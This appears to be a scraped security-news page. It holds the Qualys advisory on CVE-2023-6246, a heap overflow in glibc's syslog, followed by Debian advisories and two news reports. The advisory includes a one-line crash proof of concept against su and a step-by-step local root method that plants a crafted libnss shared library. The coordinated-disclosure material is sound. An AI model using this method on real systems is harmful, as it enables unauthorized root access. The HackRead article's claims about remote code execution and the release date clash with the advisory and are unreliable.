Qualys discovered a heap-based buffer overflow in the GNU C Library's __vsyslog_internal() function, which is called by both syslog() and vsyslog(). This vulnerability was introduced in glibc 2.37 (in August 2022).

    Qualys Security AdvisoryCVE-2023-6246: Heap-based buffer overflow in the glibc's syslog()========================================================================Contents========================================================================SummaryAnalysisProof of conceptExploitationAcknowledgmentsTimeline========================================================================Summary========================================================================We discovered a heap-based buffer overflow in the GNU C Library's__vsyslog_internal() function, which is called by both syslog() andvsyslog(). This vulnerability was introduced in glibc 2.37 (in August2022) by the following commit:  https://sourceware.org/git?p=glibc.git;a=commit;h=52a5be0df411ef3ff45c10c7c308cb92993d15b1and was also backported to glibc 2.36 because this commit was a fix foranother, minor vulnerability in __vsyslog_internal() (CVE-2022-39046, an"uninitialized memory [read] from the heap"):  https://sourceware.org/bugzilla/show_bug.cgi?id=29536For example, we confirmed that Debian 12 and 13, Ubuntu 23.04 and 23.10,and Fedora 37 to 39 are vulnerable to this buffer overflow. Furthermore,we successfully exploited an up-to-date, default installation of Fedora38 (on amd64): a Local Privilege Escalation, from any unprivileged userto full root. Other distributions are probably also exploitable.To the best of our knowledge, this vulnerability cannot be triggeredremotely in any likely scenario (because it requires an argv[0], or anopenlog() ident argument, longer than 1024 bytes to be triggered).Last-minute note: in December 1997 Solar Designer published informationabout a very similar vulnerability in the vsyslog() of the old Linuxlibc (https://insecure.org/sploits/linux.libc.5.4.38.vsyslog.html).========================================================================Analysis========================================================================In the glibc, both syslog() and vsyslog() call the vulnerable function__vsyslog_internal():------------------------------------------------------------------------122 __vsyslog_internal (int pri, const char *fmt, va_list ap,123                     unsigned int mode_flags)124 {125   /* Try to use a static buffer as an optimization.  */126   char bufs[1024];127   char *buf = NULL;128   size_t bufsize = 0;...171 #define SYSLOG_HEADER(__pri, __timestamp, __msgoff, pid) \172   "<%d>%s%n%s%s%.0d%s: ",                                \173   __pri, __timestamp, __msgoff,                          \174   LogTag == NULL ? __progname : LogTag,                  \175   "[" + (pid == 0), pid, "]" + (pid == 0)...182     l = __snprintf (bufs, sizeof bufs,183                     SYSLOG_HEADER (pri, timestamp, &msgoff, pid));...187   if (0 <= l && l < sizeof bufs)188     {...202     }203 204   if (buf == NULL)205     {206       buf = malloc ((bufsize + 1) * sizeof (char));...213             __snprintf (buf, l + 1,214                         SYSLOG_HEADER (pri, timestamp, &msgoff, pid));...221           __vsnprintf_internal (buf + l, bufsize - l + 1, fmt, apc,222                                 mode_flags);------------------------------------------------------------------------- at lines 182-183, SYSLOG_HEADER() includes __progname (the basename()  of argv[0]) if LogTag is NULL (e.g., if openlog() was not called, or  called with a NULL ident argument);- because a local attacker fully controls argv[0] and hence __progname  (even when executing a SUID-root program such as su), at line 187 l  (the return value of __snprintf()) can be larger than sizeof bufs  (1024), in which case the code block at lines 188-202 is skipped;- consequently, at line 203 buf is still NULL and bufsize is still 0,  and at line 206 a very small 1-byte buf is malloc()ated (because  bufsize is 0);- at lines 213-214 this small buf is overflowed with the attacker-  controlled __progname (because l is larger than 1024), and at lines  221-222 this small buf is further overflowed (because bufsize - l + 1  is 0 - l + 1, a very large size_t).========================================================================Proof of concept========================================================================$ (exec -a "`printf '%0128000x' 1`" /usr/bin/su < /dev/null)Password: Segmentation fault (core dumped)========================================================================Exploitation========================================================================We decided to exploit this vulnerability through su (the most commonSUID-root program) on Fedora 38. To authenticate a user, su calls thePAM library, and if the password provided by the user is incorrect, thenPAM calls the glibc's syslog() function without calling openlog() first,thus allowing us to trigger the buffer overflow in __vsyslog_internal():------------------------------------------------------------------------782                         pam_syslog(pamh, LOG_NOTICE,783                                  "authentication failure; "784                                  "logname=%s uid=%d euid=%d "785                                  "tty=%s ruser=%s rhost=%s "786                                  "%s%s",787                                  new->name, new->uid, new->euid,788                                  tty ? (const char *)tty : "",789                                  ruser ? (const char *)ruser : "",790                                  rhost ? (const char *)rhost : "",791                                  (new->user && new->user[0] != '\0')792                                   ? " user=" : "",793                                  new->user794                         );------------------------------------------------------------------------107 pam_syslog (const pam_handle_t *pamh, int priority,108             const char *fmt, ...)109 {...113   pam_vsyslog (pamh, priority, fmt, args);------------------------------------------------------------------------ 73 pam_vsyslog (const pam_handle_t *pamh, int priority, 74              const char *fmt, va_list args) 75 { .. 81       if (asprintf (&msgbuf1, "%s(%s:%s):", pamh->mod_name, 82                     pamh->service_name?pamh->service_name:"<unknown>", 83                     _pam_choice2str (pamh->choice)) < 0) .. 91   if (vasprintf (&msgbuf2, fmt, args) < 0) .. 99   syslog (LOG_AUTHPRIV|priority, "%s %s",100           (msgbuf1 ? msgbuf1 : _PAM_SYSTEM_LOG_PREFIX), msgbuf2);------------------------------------------------------------------------But what should we overwrite in the heap to successfully exploit thisbuffer overflow? Initially, because su calls setlocale(LC_ALL, ""); atthe very beginning of its su_main() function, we tried to reuse the keyidea from our Baron Samedit exploits (CVE-2021-3156 in Sudo): we wrote arudimentary fuzzer to execute su with a random argv[0] and random localeenvironment variables and automatically inspect the resulting crashes ingdb. Unfortunately this fuzzer failed to produce interesting results: weonly obtained a handful of unique crashes, and they did not look verypromising.However, we did not investigate the reasons for this failure, becausewhile browsing through su's source code we noticed that su_main() callsenv_whitelist_from_string() to parse the argument of the -w command-lineoption:------------------------------------------------------------------------1118                 case 'w':1119                         env_whitelist_from_string(su, optarg);1120                         break;------------------------------------------------------------------------ 692 static int env_whitelist_from_string(struct su_context *su, const char *str) 693 { 694         char **all = strv_split(str, ","); ... 703         STRV_FOREACH(one, all) 704                 env_whitelist_add(su, *one); 705         strv_free(all); 706         return 0; 707 }------------------------------------------------------------------------ 662 static int env_whitelist_add(struct su_context *su, const char *name) 663 { 664         const char *env = getenv(name); 665  666         if (!env) 667                 return 1; 668         if (strv_extend(&su->env_whitelist_names, name)) 669                 err_oom(); 670         if (strv_extend(&su->env_whitelist_vals, env)) 671                 err_oom(); 672         return 0; 673 }------------------------------------------------------------------------Conveniently, env_whitelist_from_string() allows us (attackers) tomalloc()ate and free() an arbitrary number of arbitrary strings at thevery beginning of su's execution: an almost perfect heap feng shui. Wetherefore rewrote our fuzzer to execute su with a random argv[0] and arandom whitelist option (instead of random locale environment variables)and immediately observed numerous unique crashes; among these, three inparticular caught our attention.========================================================================1/ Corruption of PAM structures========================================================================Surprisingly, our fuzzer directly overwrote two PAM function pointers(in struct pam_data and struct handler):------------------------------------------------------------------------Thread 2.1 "su" received signal SIGSEGV, Segmentation fault.0x00007fa7d3b0e3ac in _pam_free_data (status=7, pamh=0x56211242ec10) at /usr/src/debug/pam-1.5.2-16.fc38.x86_64/libpam/pam_data.c:161161                 last->cleanup(pamh, last->data, status);...=> 0x7fa7d3b0e3ac <pam_end+92>: call   *%raxrax            0x4141414141414141  4702111234474983745------------------------------------------------------------------------Thread 2.1 "su" received signal SIGSEGV, Segmentation fault.0x00007f928b5e5781 in _pam_dispatch_aux (use_cached_chain=<optimized out>, resumed=<optimized out>, h=0x55f2e374aae0, flags=0, pamh=0x55f2e374aae0) at /usr/src/debug/pam-1.5.2-16.fc38.x86_64/libpam/pam_dispatch.c:110110                 retval = h->func(pamh, flags, h->argc, h->argv);...=> 0x7f928b5e5781 <_pam_dispatch+465>:  call   *%raxrax            0x4545454545454545  4991471925827290437------------------------------------------------------------------------Although this sounds exciting at first (a call to 0x4141414141414141!)we decided to not pursue this avenue of exploitation:- we cannot overwrite such a function pointer with null bytes (because  we overflow __vsyslog_internal()'s buffer with a null-terminated  string), but userland addresses contain at least two null bytes;- we could try to partially overwrite such a function pointer, but we do  not control the end of the string that overflows __vsyslog_internal()'s  buffer (the end of the aforementioned pam_syslog() format string), and  such an uncontrolled, partially overwritten function pointer is very  unlikely to miraculously point to a useful ROP gadget.========================================================================2/ Corruption of heap metadata========================================================================Unsurprisingly, our fuzzer also overwrote various pieces of heapmetadata (chunk headers managed internally by the glibc's malloc), andtherefore triggered all kinds of assertion failures and security checks:------------------------------------------------------------------------$ grep -A1 __libc_message fuzzer.out | cut -d'"' -f2 | sort -u...chunk_main_arena (bck->bk)chunk_main_arena (fwd)corrupted double-linked listcorrupted double-linked list (not small)corrupted size vs. prev_sizecorrupted size vs. prev_size in fastbinsdouble free or corruption (out)free(): corrupted unsorted chunksfree(): invalid next size (fast)free(): invalid pointerfree(): invalid sizemalloc_consolidate(): invalid chunk sizemalloc(): corrupted top sizemalloc(): invalid size (unsorted)malloc(): smallbin double linked list corruptedmalloc(): unaligned tcache chunk detectedmalloc(): unsorted double linked list corruptedmunmap_chunk(): invalid pointer------------------------------------------------------------------------Although some of these corruptions might be exploitable, we decided tonot pursue this avenue of exploitation either:- we cannot overwrite a chunk header with a size field and an fd or bk  pointer that are both valid (they must both contain null bytes to be  valid), which severely limits our exploitation options;- in any case, we would probably need a specific heap, mmap, or stack  address to exploit such a corruption, but we do not have the luxury of  an information leak, and all these addresses are too heavily  randomized by ASLR to be brute forced.========================================================================3/ Corruption of nss structures========================================================================Our fuzzer also produced two crashes that immediately caught ourattention because they are directly related to one of the techniquesthat we used to exploit Baron Samedit:------------------------------------------------------------------------Thread 2.1 "su" received signal SIGSEGV, Segmentation fault.__GI___nss_lookup (ni=ni@entry=0x7ffe876a05e8, fct_name=fct_name@entry=0x7fbba214e4e7 "getpwnam_r", fct2_name=fct2_name@entry=0x0, fctp=fctp@entry=0x7ffe876a05f0) at nsswitch.c:6767        *fctp = __nss_lookup_function (*ni, fct_name);...=> 0x7fbba20ec50e <__GI___nss_lookup+30>:       mov    (%rax),%rdirax            0x4141414141414141  4702111234474983745------------------------------------------------------------------------Thread 2.1 "su" received signal SIGSEGV, Segmentation fault.__nss_module_get_function (module=0x4141414141414141, name=name@entry=0x7f0aed9034e7 "getpwnam_r") at nss_module.c:328328       if (!__nss_module_load (module))...=> 0x7f0aed8a34b7 <__nss_module_get_function+39>:       mov    (%rdi),%eaxrdi            0x4141414141414141  4702111234474983745------------------------------------------------------------------------As discussed in the "2/ struct service_user overwrite" subsection of ourBaron Samedit advisory, if we overwrite the name[] field of a heap-basedstruct nss_module with a string of characters that contains a slash (forexample "A/B/C"), then at lines 180-181 the name of a shared library isconstructed ("libnss_A/B/C.so.2"), and at line 187 this shared libraryis loaded from our current working directory (because its name containsa slash, but does not start with a slash) and executed as root (becausesu is a SUID-root program):------------------------------------------------------------------------170 module_load (struct nss_module *module)171 {...180     if (__asprintf (&shlib_name, "libnss_%s.so%s",181                     module->name, __nss_shlib_revision) < 0)...187     handle = __libc_dlopen (shlib_name);------------------------------------------------------------------------Unfortunately, the __progname part (which we control) of the string thatoverflows __vsyslog_internal()'s buffer cannot contain a slash (because__progname is the basename() of argv[0]). Luckily, however, the part ofthe overflowing string that we do not control (the pam_syslog() formatstring) includes the absolute path of our tty, which contains a slash.For example, if:- our tty is /dev/pts/23 (we use forkpty() in our exploit);- our unprivileged local user is nobody (uid 65534);- the argv[0] (and hence __progname) that we use to execute su is a long  string of 'A' characters (longer than 1024);then we can overwrite the name[] field of a heap-based struct nss_modulewith a string of the form:  "AAAAAAAAAA: pam_unix(su:auth): authentication failure; logname= uid=65534 euid=0 tty=/dev/pts/23 ruser=nobody rhost=  user=root"Consequently, if we first create the following three directories (in ourcurrent working directory):  "libnss_AAAAAAAAAA: pam_unix(su:auth): authentication failure; logname= uid=65534 euid=0 tty="  "libnss_AAAAAAAAAA: pam_unix(su:auth): authentication failure; logname= uid=65534 euid=0 tty=/dev"  "libnss_AAAAAAAAAA: pam_unix(su:auth): authentication failure; logname= uid=65534 euid=0 tty=/dev/pts"and also create the following shared library (in our current workingdirectory):  "libnss_AAAAAAAAAA: pam_unix(su:auth): authentication failure; logname= uid=65534 euid=0 tty=/dev/pts/23 ruser=nobody rhost=  user=root.so.2"then this shared library will eventually be loaded and executed withfull root privileges. In our tests, it takes a few 10,000s of tries tosuccessfully brute force the exploit parameters (the length of argv[0],and the whitelist option and its associated environment variables).Note: this exploit could certainly be made much more efficient; intheory, it could even be a one-shot exploit, because we do not need tobrute force the ASLR, only the heap layout.========================================================================Acknowledgments========================================================================We thank the glibc developers (Carlos O'Donell, Siddhesh Poyarekar,Arjun Shankar, Florian Weimer, and Adhemerval Zanella in particular),Red Hat Product Security (Guilherme Suckevicz in particular), and themembers of linux-distros@openwall (Salvatore Bonaccorso in particular).========================================================================Timeline========================================================================2023-11-07: We sent a preliminary draft of our advisory to Red HatProduct Security.2023-11-15: Red Hat Product Security acknowledged receipt of our email.2023-11-16: Red Hat Product Security asked us if we could share ourexploit with them.2023-11-17: We sent our exploit to Red Hat Product Security.2023-11-21: Red Hat Product Security confirmed that our exploit worked,and assigned CVE-2023-6246 to this heap-based buffer overflow in__vsyslog_internal().2023-12-05: Red Hat Product Security sent us a patch for CVE-2023-6246(written by the glibc developers), and asked us for our feedback.2023-12-07: While reviewing this patch, we discovered two more minorvulnerabilities in the same function (an off-by-one buffer overflow andan integer overflow). We immediately sent an analysis, proof of concept,and patch proposal to Red Hat Product Security, and suggested that wedirectly involve the glibc security team.2023-12-08: Red Hat Product Security acknowledged receipt of our email,and agreed that we should directly involve the glibc security team. Wecontacted them on the same day, and they immediately replied with veryconstructive comments.2023-12-11: The glibc security team suggested that we postpone thecoordinated disclosure of all three vulnerabilities until January 2024(because of the upcoming holiday season). We agreed.2023-12-13: Red Hat Product Security assigned CVE-2023-6779 to theoff-by-one buffer overflow and CVE-2023-6780 to the integer overflow in__vsyslog_internal().2024-01-04: We suggested either January 23 or January 30 for theCoordinated Release Date of these vulnerabilities. The glibc developersagreed on January 30.2024-01-12: The glibc developers sent us an updated version of thepatches for these vulnerabilities.2024-01-13: We reviewed these patches, and sent our feedback to theglibc developers.2024-01-15: The glibc developers sent us the final version of thepatches for these vulnerabilities.2024-01-16: We sent these patches and a draft of our advisory to thelinux-distros@openwall. They immediately acknowledged receipt of ouremail.2024-01-30: Coordinated Release Date (18:00 UTC).

glibc syslog() Heap-Based Buffer Overflow

Debian Linux Security Advisory 5611-1 - The Qualys Research Labs discovered several vulnerabilities in the GNU C Library's __vsyslog_internal() function (called by syslog() and vsyslog()). A heap-based buffer overflow (CVE-2023-6246), an off-by-one heap overflow (CVE-2023-6779) and an integer overflow (CVE-2023-6780) can be exploited for privilege escalation or denial of service.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5611-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
January 30, 2024                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : glibc  
CVE ID         : CVE-2023-6246 CVE-2023-6779 CVE-2023-6780

The Qualys Research Labs discovered several vulnerabilities in the GNU C  
Library's __vsyslog_internal() function (called by syslog() and  
vsyslog()). A heap-based buffer overflow (CVE-2023-6246), an off-by-one  
heap overflow (CVE-2023-6779) and an integer overflow (CVE-2023-6780)  
can be exploited for privilege escalation or denial of service.

Details can be found in the Qualys advisory at  
https://www.qualys.com/2024/01/30/syslog

Additionally a memory corruption was discovered in the glibc's qsort()  
function, due to missing bounds check and when called by a program  
with a non-transitive comparison function and a large number of  
attacker-controlled elements. As the use of qsort() with a  
non-transitive comparison function is undefined according to POSIX and  
ISO C standards, this is not considered a vulnerability in the glibc  
itself. However the qsort() implementation was hardened against  
misbehaving callers.

Details can be found in the Qualys advisory at  
https://www.qualys.com/2024/01/30/qsort

For the stable distribution (bookworm), these problems have been fixed in  
version 2.36-9+deb12u4.

We recommend that you upgrade your glibc packages.

For the detailed security status of glibc please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/glibc

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmW5P2BfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0TCeQ//VD4TdNtM/wBBMsQ2/RTFVO81yT6ZJ2jxy8v2h9ZZtsBhi1kMP+P4E2pC  
yAl+8TGZpKCbMqifecV85Z9674aUfEFrqju8E1Mt1kp63MTmagJvPuZg318hjMRg  
byve8v9nMJjpAotbetz5TesUX3eZeWbkAyqd45vg3g40lIyJHusKra5XEmAxflEB  
8zFwZhwWVOZ7cIH2sbsRFprgPcz5YYKAvUEfVWQxikWaN+7XGNKzue6Ar0pkHHGd  
reLUTnGDv4NMr1Y7JLMau/nIO2JXvl7V2+EefFw02/vmRPovz4ZtmWek3vc2DRl9  
JfGEIOkMpbxPgp0dZ2AyKjOEIpIutvGqzLm53MkcajvVlVAMyPPj25rgytaK+07T  
RS+oP77Bw+pDjRu1PpyCDRWIOCJmqP8esyq5IfMuLDBYPT8JvOyq2Iy/q5U+OvXL  
nYzvNXfqIkencR0Sd83aRGho6vWSy89mJEWhvMhjYmriJz7ipQo6t+FZb2Jq23wJ  
pXTcWz5ljtuSQRmf2A98InQsyg1sBVj3dH/8uYEl5f58TvF06SL6vJwtxJED1vLk  
LR9D1G2zyoJf6PFPMj+qtgdZKxYPX6Zr3nJTNRwM74Z8AYQEcuczWm2vhq78ipPi  
AyAjNDzU/MPUaDTKeyjS04XD3tyOD3RDPWDjKhV/BiKFuAjuqro=  
=Zs+W  
-----END PGP SIGNATURE-----

Debian Security Advisory 5611-1

By Deeba Ahmed
Patch Now or Pay Later: Qsort Flaw Leaves Millions of Linux Systems Exposed.
This is a post from HackRead.com Read the original post: Critical Flaws Found in GNU C Library, Major Linux Distros at Risk

Millions of Linux systems are at risk due to four critical vulnerabilities found in the GNU C Library (glibc), a fundamental component of most Linux distributions.

The Qualys Threat Research Unit (TRU) has discovered four significant vulnerabilities in the GNU C Library, a crucial component of Linux-based systems. Researchers have discovered multiple vulnerabilities in the library’s syslog and qsort functions, raising significant security concerns.

The first vulnerability, tracked as CVE-2023-6246, is a heap-based buffer overflow law. It is discovered in the GNU C Library’s \_\_vsyslog\_internal() function and affects syslog() and vsyslog().

The vulnerability, originating in glibc 2.37 introduced in August 2022, was subsequently backported to glibc 2.36, leading to its tracing. Most major Linux distributions, including Debian, Ubuntu, and Fedora, are vulnerable to this flaw, which allows local privilege escalation and lets unprivileged users gain full root access.

The same function affected by CVE-2023-6246 has two more, but minor impact vulnerabilities: CVE-2023-6779 (glibc) and CVE-2023-6780 (glibc). These vulnerabilities involve off-by-one heap-based buffer overflows and integer overflow issues.

Once triggered, these flaws appeared far more challenging than the first vulnerability (CVE-2023-6246). Further probing revealed that their effective exploitation is even more complex.  

The last one is a memory corruption issue discovered in the GNU C Library’s qsort function, occurring due to missing bounds check. This vulnerability can be exploited when qsort() is used with a nontransitive comparison function and when an attacker manages to control a large number of elements, leading to malloc() failure.

The flaws affect glibc’s handling of input formats within syslog() and could trigger buffer overflows and memory corruption, allowing attackers to inject malicious code into vulnerable systems. Exploitation of these vulnerabilities may allow attackers to gain remote code execution (RCE) on affected systems, potentially leading to data theft and system compromise.

The syslog vulnerability allows root access, affecting major Linux distributions, while the qsort vulnerability leads to memory corruption. What is more concerning is that the vulnerabilities affect all glibc versions from September 1992 (glibc 1.04) to the current release (glibc 2.38).

TRU contacted the glibc security team regarding the flaws on 12 December 2023, but the team decided not to treat memory corruption in qsort() as a vulnerability. On 16 January 2024, TRU backported commit b9390ba to all stable versions of glibc, and the coordinated release date was set for 30 January 2023.

The discovery highlights the painful fact that even the most trusted components can have flaws. These issues usually have far-reaching implications, potentially impacting millions of users globally and making a large number of applications vulnerable and exploitable, as noted by TRU’s Product Manager, Saeed Abbasi in the company’s blog post:

“The recent discovery of these vulnerabilities is not just a technical concern but a matter of widespread security implications.”

Users are advised to update their glibc versions immediately to mitigate risks, while system administrators and developers should review their applications/libraries to ensure their systems are safe.

1.  **Mélofée: The Latest Malware Targeting Linux Servers**
2.  **WiFi Flaws Allow Network Traffic Interception on Linux**
3.  **Bluetooth Vulnerability Enables Keystroke Injection Linux**
4.  **Linux Vulnerability Exposes Millions of Systems to Attack**
5.  **Free Download Manager Site Pushed Linux Password Stealer**

Critical Flaws Found in GNU C Library, Major Linux Distros at Risk

Malicious local attackers can obtain full root access on Linux machines by taking advantage of a newly disclosed security flaw in the GNU C library (aka glibc).
Tracked as CVE-2023-6246, the heap-based buffer overflow vulnerability is rooted in glibc's __vsyslog_internal() function, which is used by syslog() and vsyslog() for system logging purposes. It's said to have been accidentally

Vulnerability / Endpoint Security

Malicious local attackers can obtain full root access on Linux machines by taking advantage of a newly disclosed security flaw in the GNU C library (aka glibc).

Tracked as CVE-2023-6246, the heap-based buffer overflow vulnerability is rooted in glibc's \_\_vsyslog\_internal() function, which is used by syslog() and vsyslog() for system logging purposes. It's said to have been accidentally introduced in August 2022 with the release of glibc 2.37.

"This flaw allows local privilege escalation, enabling an unprivileged user to gain full root access," Saeed Abbasi, product manager of the Threat Research Unit at Qualys, said, adding it impacts major Linux distributions like Debian, Ubuntu, and Fedora.

A threat actor could exploit the flaw to obtain elevated permissions via specially crafted inputs to applications that employ these logging functions.

"Although the vulnerability requires specific conditions to be exploited (such as an unusually long argv\[0\] or openlog() ident argument), its impact is significant due to the widespread use of the affected library," Abbasi noted.

The cybersecurity firm said further analysis of glibc unearthed two more flaws in the \_\_vsyslog\_internal() function (CVE-2023-6779 and CVE-2023-6780) and a third bug in the library's qsort () function that can lead to memory corruption.

The vulnerability found in qsort() has affected all glibc versions released since 1992.

The development comes nearly four months after Qualys detailed another high-severity flaw in the same library called Looney Tunables (CVE-2023-4911, CVSS score: 7.8) that could result in privilege escalation.

"These flaws highlight the critical need for strict security measures in software development, especially for core libraries widely used across many systems and applications," Abbasi said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Glibc Flaw Grants Attackers Root Access on Major Linux Distros

Debian Linux Security Advisory 5610-1 - Multiple security issues were discovered in Redis, a persistent key-value database, which could result in the execution of arbitrary code or ACL bypass.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5610-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJanuary 29, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : redisCVE ID         : CVE-2022-24834 CVE-2023-36824 CVE-2023-41053                 CVE-2023-41056 CVE-2023-45145Multiple security issues were discovered in Redis, a persistentkey-value database, which could result in the execution of arbitrarycode or ACL bypass.For the stable distribution (bookworm), these problems have been fixed inversion 5:7.0.15-1~deb12u1.We recommend that you upgrade your redis packages.For the detailed security status of redis please refer toits security tracker page at:https://security-tracker.debian.org/tracker/redisFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmW4FTMACgkQEMKTtsN8TjZJvBAAhC0xNfda1GVgbCT3iTVM6qoD5UD+ZzXbpvvn2FKApdD4prQdJyC4FHGvKX8V14qgqPb51nh9quOAmP07J6dCYlc8zesAq3VuffkspetRBw5NGfnlixgB7QXQ0/QTinQf7ErInV1BdfJVWPJ0PAxIVj3SkkiE+TysY5xkTijn+KcnnAKsbTiUYvwAAh8q27XYI4w5YWdSh87cA/hL5lfmWyzefPnp7rIrk/nHvkYs54/Rs6PuJaJ3tv4OQ3lfOotxvSzWKaNAQRlzPbgZsdl+HRTvmZUALDnZEr4ETD0T+lvkjU+srI7mndUmk9LvSxzcoUetQZEZLq/764jGurNysfxmHmiAEflzj1BC9OpDh4mm7bYFpFqqGZ9RP7Mvsh5Qae6lyWdqwhiumr60fjdzHYj/6ckeUDlnHgbOVHoultnMTQ8Px6GuWoEmK4JIrKZVjIS2FQ7V8sIBu38sGx+054RJeMqR6iO5bHzulwRJ0bIE8gh/47ElfszifMoZtFPnjW/PA0YnyWfWLWVLYwrwaIa7oP27atuz1LQX6reUO1t0zdwZN1YedU8pUxLHBYyozjQIVbV94QnPETRd6QQoNdtKdFcTrINYgQRiyvcjJGqaQ4VwL0Cw9tprDvFCM9x/OWVwT6ZTspYPWJ6qjBB9x8e9GBG2w0wSC1yeAc0zDoU==IDW1-----END PGP SIGNATURE-----

Debian Security Advisory 5610-1

Debian Linux Security Advisory 5609-1 - Several vulnerabilities were discovered in the Slurm Workload Manager, a cluster resource management and job scheduling system, which may result in privilege escalation, denial of service, bypass of message hash checks or opening files with an incorrect set of extended groups.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5609-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoJanuary 28, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : slurm-wlmCVE ID         : CVE-2023-49933 CVE-2023-49936 CVE-2023-49937 CVE-2023-49938Debian Bug     : 1058720Several vulnerabilities were discovered in the Slurm Workload Manager, acluster resource management and job scheduling system, which may resultin privilege escalation, denial of service, bypass of message hashchecks or opening files with an incorrect set of extended groups.For the stable distribution (bookworm), these problems have been fixedin version 22.05.8-4+deb12u2.We recommend that you upgrade your slurm-wlm packages.For the detailed security status of slurm-wlm please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/slurm-wlmFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmW2Sj9fFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0Q/0xAAiIX2hFquenx281NrzLcnOeIiuvf/+2eXs4/yVQ2P91S7kTzdbRc9n1dVAIwcvQHKHlQH7z/GHVLtjLDwjiAc34OcPzvLipiFgg6JRmKweOMWqyRns9DaIy4vRZRg7RvS4ltDOuqP9UXScTom4GAM3GCF6wrvxsyNwSvwayaJtqQw09OjWHJsKOPeaKJ6yIBfXUukreUQUctVH5P3HG58S1WD/8EqYrpgxC0mBYxs2Iv2FkEcyyiWY2mthuOqkmzfxf25xzQqlDg7kPMikHkqsHmKiFViAWOe44o0C7jED1JOh72BZk93ktrBWaA0lqj9w+CUhPoUinOL76qn+ija8URNIlnPExmY8/BlBDwEZ9pawTo/wv/IS34GzPDrpQQsBTRPpfO9FrJYPf87Ryfp7OpkWfa6LLqTckDp0PQc05/ABdKVtBw/OtfHZud9/qO+M80045IP4QIzDOiYkAQPEbnS3qlT6Io8RYu4C1tNiALBksMnuim3E63dKbRN4lBzCujKY0clKPLtafE6uNXv9gpQRdq2irDGo+IY8A2rfziWqrmdmiP5bxyQsZNpTuNSVGa5s+skId17xZDH/uQBi6UTT/0Qz8mceqa1Ufzu2bbpNHVdgGZ+YbAjAT7bOr5AY1JHqdCDXx6Pl2vQhIss20R3bxi8O0oZODPquGWgkwA==fdxl-----END PGP SIGNATURE-----

Debian Security Advisory 5609-1

Debian Linux Security Advisory 5608-1 - A heap-based buffer overflow during tile list parsing was discovered in the AV1 video codec parser for the GStreamer media framework, which may result in denial of service or potentially the execution of arbitrary code if a malformed media file is opened.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5608-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoJanuary 27, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : gst-plugins-bad1.0CVE ID         : CVE-2024-0444A heap-based buffer overflow during tile list parsing was discovered inthe AV1 video codec parser for the GStreamer media framework, which mayresult in denial of service or potentially the execution of arbitrarycode if a malformed media file is opened.For the oldstable distribution (bullseye), this problem has been fixedin version 1.18.4-3+deb11u4.For the stable distribution (bookworm), this problem has been fixed inversion 1.22.0-4+deb12u5.We recommend that you upgrade your gst-plugins-bad1.0 packages.For the detailed security status of gst-plugins-bad1.0 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/gst-plugins-bad1.0Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP 